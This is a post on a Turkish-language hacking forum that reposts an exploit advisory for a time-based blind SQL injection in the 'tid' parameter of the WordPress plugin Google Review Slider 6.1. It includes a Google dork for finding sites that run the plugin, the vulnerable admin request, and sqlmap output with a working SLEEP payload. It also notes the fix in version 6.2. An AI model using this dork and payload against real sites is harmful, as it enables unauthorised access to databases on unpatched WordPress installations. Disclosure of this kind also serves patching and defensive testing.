Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection

'Web Application Exploits' forumunda KaliBot tarafından 31 Ekim 2019 tarihinde açılan konu

  1. KaliBot

    KaliBot Administrator Site Yetkilisi

    Katılım:
    30 Haziran 2015
    Mesaj:
    559
    Beğeniler:
    69
    Ödül Puanları:
    12
    Kod:
    # Exploit Title: Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection
    # Google Dork: inurl:"/wp-content/plugins/wp-google-places-review-slider/"
    # Date: 2019-07-02
    # Exploit Author: Princy Edward
    # Exploit Author Blog : https://prinyedward.blogspot.com/
    # Vendor Homepage: https://wordpress.org/plugins/wp-google-places-review-slider/
    # Version: 6.1
    # Tested on: Apache/2.2.24 (CentOS)
    # CVE :
    
    #POC :
    
    GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***
    &taction=edit HTTP/1.1
    
    #SQLMAP Result :
    sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
    ---
    Parameter: tid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
    (SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit
    
    # Changeset:
    # Issue fixed in version 6.2
    # https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2180197%40wp-google-places-review-slider&old=2163061%40wp-google-places-review-slider&sfp_email=&sfph_mail=
    
    Cheers!
    PrincyEdward
     
    MacTavish ve MrX bunu beğendi.

Bu Sayfayı Paylaş